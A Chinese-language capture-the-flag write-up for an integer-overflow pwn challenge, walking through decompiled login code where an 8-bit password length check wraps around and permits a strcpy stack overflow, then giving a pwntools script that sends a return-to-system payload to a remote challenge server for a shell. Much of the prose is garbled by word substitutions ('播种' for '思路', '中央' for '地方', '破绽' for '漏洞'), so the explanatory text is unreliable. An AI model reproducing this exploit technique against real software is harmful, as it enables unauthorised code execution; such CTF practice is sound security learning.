做了一下午的攻防世界的题,总算快把老手区的题做完了,这里放一道有播种的题
播种是 利用整数溢出
利用 checksec
看一看 IDA 外面的货色
int __cdecl main(int argc, const char **argv, const char **envp)
{int v4; // [esp+Ch] [ebp-Ch]
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
puts("---------------------");
puts("~~ Welcome to CTF! ~~");
puts("1.Login");
puts("2.Exit");
puts("---------------------");
printf("Your choice:");
__isoc99_scanf("%d", &v4);
if (v4 == 1)
{login();
}
else
{if ( v4 == 2)
{puts("Bye~");
exit(0);
}
puts("Invalid Choice!");
}
return 0;
}
发现有判断,间接进入 login
char *login()
{char buf; // [esp+0h] [ebp-228h]
char s; // [esp+200h] [ebp-28h]
memset(&s, 0, 0x20u);
memset(&buf, 0, 0x200u);
puts("Please input your username:");
read(0, &s, 0x19u);
printf("Hello %s\n", &s);
puts("Please input your passwd:");
read(0, &buf, 0x199u);
return check_passwd(&buf);
}
发现有俩个读入,而且数目很大
再次进入返回函数
char *__cdecl check_passwd(char *s)
{
char *result; // eax
char dest; // [esp+4h] [ebp-14h]
unsigned __int8 v3; // [esp+Fh] [ebp-9h]
v3 = strlen(s);
if (v3 <= 3u || v3 > 8u)
{puts("Invalid Password");
result = (char *)fflush(stdout);
}
else
{puts("Success");
fflush(stdout);
result = strcpy(&dest, s);
}
return result;
}
这里就是咱们要重点利用的中央,由反汇编代码,咱们发现 s 的长度必须在 3,8 之间,else 下有发现有栈溢出破绽,但 s 不可能么大。
察看到 v3 是 8 位整数,正好能够利用整数溢出,则填入 259-263 的字节数即可填充 s 而后通过 strcpy 来取得 shell
上面是WA
# coding=utf-8
from pwn import *
context.log_level = 'debug'
sys_plt = 0x08048520
elf=ELF('./intoverflow')
sys_addr = elf.symbols['what_is_this']
payload = 'a'*24 + p32(sys_plt) + 'a' * 4 + p32(0x08048960)
payload = payload.ljust(260,'a') #ljust 能够用 a 来填充 payload 到指定长度 260
p = remote('111.200.241.244',52073)
p.sendlineafter('Your choice:','1')
p.sendlineafter('your username:','aa')
p.sendlineafter('your passwd:',payload)
p.interactive()
说一下让本人坑的中央
- 少用 ’\x00’ 来填充,因为很多函数都是用它来作为完结的判断,在前面填充时始终不对。
- 留神到 read 读取的数量,出题人善意的清理了一下区域,所以能准确读取发送的内容,本人最好也在发送内容前面加上截断。
- 留神函数名字的变动,我始终在填充 20h 的 s 呜呜呜 u 呜呜呜
以上